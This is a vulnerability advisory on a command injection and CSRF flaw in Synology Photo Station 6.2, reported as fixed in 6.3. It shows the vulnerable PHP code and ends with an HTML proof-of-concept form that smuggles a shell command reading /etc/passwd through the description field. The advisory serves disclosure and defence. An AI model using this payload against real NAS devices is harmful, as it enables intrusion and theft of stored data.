Abstract
A command injection vulnerability was found in Synology Photo Station, which allows an attacker to execute arbitrary commands with the privileges of the webserver. An attacker can use this vulnerability to compromise a Synology DiskStation NAS, including all data stored on the NAS.
Tested version
This issue was tested on Synology Photo Station version 6.2-2858.
Fix
Synology reports that this issue has been resolved in Photo Station version 6.3-2945. https://www.synology.com/en-us/releaseNote/PhotoStation
Introduction
Synology Photo Station is an online photo album that is managed by DiskStation Manager (DSM). Synology NAS provides the home/photo folder for storing photos and videos that can be viewed via a web browser.
A command injection vulnerability was found in Synology Photo Station, which allows an attacker to execute arbitrary commands with the privileges of the webserver (http).
Details
Photo Station calls other Synology applications (eg, /usr/syno/bin/synophoto_dsm_user) using operating systems commands. It was found that Photo Station does not properly sanitize user input and as a result attackers can inject their own systems commands that will be executed by Photo Station. In particular this issue can be exploited via the description
POST parameter. The affected code is listed below:
public static function UpdateDescriptionMetadata($path, **$description**)
{
//update metadata
$cmd = sprintf('%s -M"set %s %s" -M"set %s %s" -M"set %s %s" -M"set %s %s" %s', SYNO_EXIFTOOL_FILE,
"Xmp.dc.description", **$description**,
"Xmp.photoshop.headline", **$description**,
"Iptc.Application2.Caption", **$description**,
"Exif.Image.ImageDescription", **$description**, escapeshellarg($path));
**@exec($cmd);**
}
As can be observed, this code uses the value of the description
parameter to construct an operating system command that is invoked using the exec()
PHP function. The user-supplied description is no validated and/or sanitize, rendering Photo Station vulnerable to command injection.
In addition, Photo Station does not protect against Cross-Site Request Forgery (CSRF) attacks. A remote attacker can abuse this and lure a victim into visiting a specially crafted web page to execute arbitrary commands with the privileges of the webserver (http
user). As a result an attacker can compromise the targeted Synology NAS, including all stored data.
Proof of concept
The following proof of concept copies the /etc/passwd
file to /var/services/photo/Securify.txt
.
<html>
<body>
<form action="http://<target>/photo/webapi/photo.php" method="POST">
<input type="hidden" name="id" value="photo_536168696e_53637265656e2053686f7420323031352d30352d31302061742032322e33342e33352e706e67" />
<input type="hidden" name="description" value="**| cat /etc/passwd > /var/services/photo/Securify.txt **" />
<input type="hidden" name="api" value="SYNO.PhotoStation.Photo" />
<input type="hidden" name="method" value="edit" />
<input type="hidden" name="version" value="1" />
<input type="hidden" name="ps_username" value="admin" />
<input type="hidden" name="" value="" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>